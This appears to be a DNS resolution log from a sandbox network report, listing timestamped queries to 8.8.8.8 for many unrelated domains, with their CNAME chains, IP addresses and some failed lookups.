                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.686043978 CEST8.8.8.8192.168.2.60x3806No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.481435061 CEST8.8.8.8192.168.2.60x9b7bNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.504553080 CEST8.8.8.8192.168.2.60xe25dNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.000031948 CEST8.8.8.8192.168.2.60xead2No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.000031948 CEST8.8.8.8192.168.2.60xead2No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.082333088 CEST8.8.8.8192.168.2.60xeb6bNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.082333088 CEST8.8.8.8192.168.2.60xeb6bNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.082333088 CEST8.8.8.8192.168.2.60xeb6bNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.645672083 CEST8.8.8.8192.168.2.60xc026No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.645672083 CEST8.8.8.8192.168.2.60xc026No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.717447996 CEST8.8.8.8192.168.2.60x2700No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.362328053 CEST8.8.8.8192.168.2.60xf529No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.896537066 CEST8.8.8.8192.168.2.60x2aecNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.006479025 CEST8.8.8.8192.168.2.60x8f61No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.006479025 CEST8.8.8.8192.168.2.60x8f61No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.480170012 CEST8.8.8.8192.168.2.60xc1edNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.013165951 CEST8.8.8.8192.168.2.60xa1f6No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.013165951 CEST8.8.8.8192.168.2.60xa1f6No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.057461023 CEST8.8.8.8192.168.2.60x9d42No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.057461023 CEST8.8.8.8192.168.2.60x9d42No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.057497025 CEST8.8.8.8192.168.2.60x9c5dNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.057497025 CEST8.8.8.8192.168.2.60x9c5dNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.066385031 CEST8.8.8.8192.168.2.60x3b85No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.066385031 CEST8.8.8.8192.168.2.60x3b85No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.074943066 CEST8.8.8.8192.168.2.60x428cNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.078568935 CEST8.8.8.8192.168.2.60xcfdbNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.078568935 CEST8.8.8.8192.168.2.60xcfdbNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.128927946 CEST8.8.8.8192.168.2.60x1887Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.178356886 CEST8.8.8.8192.168.2.60x68e5No error (0)www.pdqhomes.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.178356886 CEST8.8.8.8192.168.2.60x68e5No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.178356886 CEST8.8.8.8192.168.2.60x68e5No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.178356886 CEST8.8.8.8192.168.2.60x68e5No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.470256090 CEST8.8.8.8192.168.2.60x452cNo error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.470256090 CEST8.8.8.8192.168.2.60x452cNo error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.506041050 CEST8.8.8.8192.168.2.60xe88dNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.506041050 CEST8.8.8.8192.168.2.60xe88dNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.506041050 CEST8.8.8.8192.168.2.60xe88dNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.511259079 CEST8.8.8.8192.168.2.60xb7f4No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.511259079 CEST8.8.8.8192.168.2.60xb7f4No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.511259079 CEST8.8.8.8192.168.2.60xb7f4No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.514400005 CEST8.8.8.8192.168.2.60x26c3No error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.514400005 CEST8.8.8.8192.168.2.60x26c3No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.514400005 CEST8.8.8.8192.168.2.60x26c3No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.565110922 CEST8.8.8.8192.168.2.60x7844No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.908502102 CEST8.8.8.8192.168.2.60xa007No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.908502102 CEST8.8.8.8192.168.2.60xa007No error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.910979033 CEST8.8.8.8192.168.2.60xd794No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.910979033 CEST8.8.8.8192.168.2.60xd794No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.910979033 CEST8.8.8.8192.168.2.60xd794No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.917407036 CEST8.8.8.8192.168.2.60x9854No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.322726965 CEST8.8.8.8192.168.2.60xb860Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.450537920 CEST8.8.8.8192.168.2.60xbc3aNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.450537920 CEST8.8.8.8192.168.2.60xbc3aNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.450537920 CEST8.8.8.8192.168.2.60xbc3aNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.477049112 CEST8.8.8.8192.168.2.60x7e90No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.477049112 CEST8.8.8.8192.168.2.60x7e90No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.477049112 CEST8.8.8.8192.168.2.60x7e90No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.477077961 CEST8.8.8.8192.168.2.60xfd26No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.483354092 CEST8.8.8.8192.168.2.60x1d0dNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.483354092 CEST8.8.8.8192.168.2.60x1d0dNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.569331884 CEST8.8.8.8192.168.2.60x7ab3No error (0)www.petsfan.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.569331884 CEST8.8.8.8192.168.2.60x7ab3No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.569331884 CEST8.8.8.8192.168.2.60x7ab3No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.569331884 CEST8.8.8.8192.168.2.60x7ab3No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.913512945 CEST8.8.8.8192.168.2.60x7214No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.108383894 CEST8.8.8.8192.168.2.60xc0cdNo error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.108383894 CEST8.8.8.8192.168.2.60xc0cdNo error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.116206884 CEST8.8.8.8192.168.2.60x2547No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.125133991 CEST8.8.8.8192.168.2.60x409No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.125133991 CEST8.8.8.8192.168.2.60x409No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.126646042 CEST8.8.8.8192.168.2.60x65a3No error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.126646042 CEST8.8.8.8192.168.2.60x65a3No error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.147468090 CEST8.8.8.8192.168.2.60x5398No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.147468090 CEST8.8.8.8192.168.2.60x5398No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.420021057 CEST8.8.8.8192.168.2.60x5b2fNo error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.420021057 CEST8.8.8.8192.168.2.60x5b2fNo error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.448966980 CEST8.8.8.8192.168.2.60x5ce1No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.448966980 CEST8.8.8.8192.168.2.60x5ce1No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.871869087 CEST8.8.8.8192.168.2.60x9793No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.878846884 CEST8.8.8.8192.168.2.60x3e55No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.878846884 CEST8.8.8.8192.168.2.60x3e55No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.998918056 CEST8.8.8.8192.168.2.60x83b7No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.998918056 CEST8.8.8.8192.168.2.60x83b7No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.347126961 CEST8.8.8.8192.168.2.60x4549No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.347126961 CEST8.8.8.8192.168.2.60x4549No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.464365959 CEST8.8.8.8192.168.2.60x27d1Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.505690098 CEST8.8.8.8192.168.2.60x1194No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.505690098 CEST8.8.8.8192.168.2.60x1194No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.588083029 CEST8.8.8.8192.168.2.60x5ae7No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.687721968 CEST8.8.8.8192.168.2.60x3423No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.935798883 CEST8.8.8.8192.168.2.60xce7eNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.961150885 CEST8.8.8.8192.168.2.60x2e64No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.965575933 CEST8.8.8.8192.168.2.60x5e73No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.417095900 CEST8.8.8.8192.168.2.60x78e6No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.417095900 CEST8.8.8.8192.168.2.60x78e6No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.554089069 CEST8.8.8.8192.168.2.60x5856No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.590193033 CEST8.8.8.8192.168.2.60x598eNo error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.638402939 CEST8.8.8.8192.168.2.60x8bacNo error (0)www.netcr.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.638402939 CEST8.8.8.8192.168.2.60x8bacNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.638402939 CEST8.8.8.8192.168.2.60x8bacNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.638402939 CEST8.8.8.8192.168.2.60x8bacNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.062050104 CEST8.8.8.8192.168.2.60xbd84Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.305715084 CEST8.8.8.8192.168.2.60x875fNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.305715084 CEST8.8.8.8192.168.2.60x875fNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.313291073 CEST8.8.8.8192.168.2.60x129cNo error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.313291073 CEST8.8.8.8192.168.2.60x129cNo error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.313291073 CEST8.8.8.8192.168.2.60x129cNo error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.465301037 CEST8.8.8.8192.168.2.60x62edNo error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.704989910 CEST8.8.8.8192.168.2.60x8be9No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.704989910 CEST8.8.8.8192.168.2.60x8be9No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.704989910 CEST8.8.8.8192.168.2.60x8be9No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.704989910 CEST8.8.8.8192.168.2.60x8be9No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.704989910 CEST8.8.8.8192.168.2.60x8be9No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.704989910 CEST8.8.8.8192.168.2.60x8be9No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.750355959 CEST8.8.8.8192.168.2.60x21edNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.870738983 CEST8.8.8.8192.168.2.60x7214Server failure (2)www.vazir.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.871093035 CEST8.8.8.8192.168.2.60xf472No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.131289005 CEST8.8.8.8192.168.2.60x1943No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.369714975 CEST8.8.8.8192.168.2.60xd066No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.369714975 CEST8.8.8.8192.168.2.60xd066No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.500128031 CEST8.8.8.8192.168.2.60x151dNo error (0)www.cokocoko.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.500128031 CEST8.8.8.8192.168.2.60x151dNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.500128031 CEST8.8.8.8192.168.2.60x151dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.500128031 CEST8.8.8.8192.168.2.60x151dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.609920979 CEST8.8.8.8192.168.2.60xa7eeNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.630722046 CEST8.8.8.8192.168.2.60x3aaeNo error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.630722046 CEST8.8.8.8192.168.2.60x3aaeNo error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.630930901 CEST8.8.8.8192.168.2.60x6c81No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.630930901 CEST8.8.8.8192.168.2.60x6c81No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.634618998 CEST8.8.8.8192.168.2.60xdd59No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.634618998 CEST8.8.8.8192.168.2.60xdd59No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.736363888 CEST8.8.8.8192.168.2.60x7977No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.741394043 CEST8.8.8.8192.168.2.60x98cbServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.832742929 CEST8.8.8.8192.168.2.60xecdfNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.867455959 CEST8.8.8.8192.168.2.60x9ae2No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.867455959 CEST8.8.8.8192.168.2.60x9ae2No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.983473063 CEST8.8.8.8192.168.2.60x8dd3No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.983473063 CEST8.8.8.8192.168.2.60x8dd3No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.983473063 CEST8.8.8.8192.168.2.60x8dd3No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.983506918 CEST8.8.8.8192.168.2.60x9222No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.983506918 CEST8.8.8.8192.168.2.60x9222No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.045686960 CEST8.8.8.8192.168.2.60x6d64No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.096730947 CEST8.8.8.8192.168.2.60xbd84Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.195808887 CEST8.8.8.8192.168.2.60xceccNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.222806931 CEST8.8.8.8192.168.2.60x68e7No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.222806931 CEST8.8.8.8192.168.2.60x68e7No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.222806931 CEST8.8.8.8192.168.2.60x68e7No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.383178949 CEST8.8.8.8192.168.2.60x6293No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.383178949 CEST8.8.8.8192.168.2.60x6293No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:35.418195009 CEST8.8.8.8192.168.2.60x494No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
